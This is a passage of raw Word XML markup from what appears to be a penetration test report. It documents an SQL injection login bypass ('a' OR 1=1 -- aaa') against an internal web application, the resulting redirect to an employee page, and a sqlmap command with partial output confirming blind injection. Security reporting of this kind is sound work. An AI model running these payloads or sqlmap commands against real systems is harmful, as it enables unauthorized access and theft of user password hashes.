      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00056C3E">
        <w:t>payloaded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00056C3E">
        <w:t xml:space="preserve"> request by redirecting to internal employee resources, as shown in the below request and response pair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5443E5D1" w14:textId="38578273" w:rsidR="00056C3E" w:rsidRPr="00056C3E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Request:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00056C3E" w14:paraId="5550EBFB" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0E6939F6" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>login.php?</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=a%27+OR+1%3D1+--+</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aaa</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&amp;password</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>test&amp;Login</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>=Enter HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C94D8E0" w14:textId="75E14E9B" w:rsidR="00056C3E" w:rsidRPr="004956AA" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Host: 10.10.0.66:8001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7732B3AA" w14:textId="5AA08F98" w:rsidR="00056C3E" w:rsidRPr="00056C3E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
      <w:pPr>
        <w:spacing w:before="240" w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Re</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sponse</w:t>
      </w:r>
      <w:r w:rsidRPr="00056C3E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00056C3E" w14:paraId="5515BD5F" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="703A6CA2" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP/1.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>302 Found</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C66660F" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Date: Mon, 01 May 2023 10:52:31 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F6613CE" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Server: Apache/2.4.29 (Ubuntu)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A12B52F" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Expires: Mon, 26 Jul 1997 05:00:00 GMT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABD7C67" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Cache-Control: no-cache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325A5B54" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pragma: no-cache</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F6E6C2C" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Location: </w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/internal/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>employee.php?authenticated</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">=1&amp;user=a' OR 1=1 -- </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aaa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="5A38B8D6" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Content-Length: 3068</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D17D650" w14:textId="77777777" w:rsidR="00056C3E" w:rsidRPr="0055639E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Connection: close</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C70F938" w14:textId="26859C79" w:rsidR="00056C3E" w:rsidRPr="004956AA" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Content-Type: text/html; charset=UTF-8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="25020E3A" w14:textId="5DFE1892" w:rsidR="00056C3E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t>The application redirect took the assessment team to an internal employee welcome page, shown in the following figure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE343BB" w14:textId="4B610CB4" w:rsidR="00056C3E" w:rsidRPr="00056C3E" w:rsidRDefault="00056C3E" w:rsidP="00056C3E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00056C3E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00142E91" wp14:editId="6AF87994">
            <wp:extent cx="5943600" cy="1965960"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="15240"/>
            <wp:docPr id="11619048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486" name="Picture 1" descr="Text&#10;&#10;Description automatically generated with low confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1965960"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="19050">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Employee Welcome Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29D854" w14:textId="3EF5A4D3" w:rsidR="0055639E" w:rsidRPr="00F66181" w:rsidRDefault="0055639E" w:rsidP="0055639E">
      <w:r>
        <w:t xml:space="preserve">After using SQL injection to successfully authenticate to the site, the assessment team continued to exploit the application SQL database using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055639E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> injection tool. This allowed them to enumerate the back-end database type, database names, table values, and discover sensitive information such as user hashes. The following figure shows highlights from the</w:t>
      </w:r>
      <w:r w:rsidRPr="0055639E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0055639E">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> output:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0055639E" w14:paraId="7C657FD9" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0B846710" w14:textId="7332127D" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u 'http://10.10.0.66:8001/login.php?username=admin&amp;password=pass&amp;Login=Enter'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7172833D" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[*] starting @ 16:16:43 /2023-04-29/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51219E5D" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C54282" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[16:16:44] [INFO] heuristic (basic) test shows that GET parameter 'username' might be injectable (possible DBMS: 'MySQL')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57953E35" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">[16:16:44] [INFO] heuristic (XSS) test shows that GET parameter 'username' might be vulnerable to cross-site scripting (XSS) </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attacks</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="13804DF3" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>[16:16:44] [INFO] testing for SQL injection on GET parameter '</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C3B1CD3" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>it</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DBMSes</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>? [Y/n] y</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CD914F" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="634C688D" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0553D5CC" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>GET parameter 'username' is vulnerable.</w:t>
            </w:r>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Do you want to keep testing the others (if any)? [y/N] n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C3DAE26" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sqlmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> identified the following injection point(s) with a total of 409 HTTP(s) requests:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="654EED1A" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FEADDAE" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Parameter: username (GET)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="104730E2" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Type: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-based blind</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="162B0B52" w14:textId="77777777" w:rsidR="0055639E" w:rsidRPr="0055639E" w:rsidRDefault="0055639E" w:rsidP="0055639E">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">    Title: MySQL RLIKE </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boolean</w:t>
            </w:r>
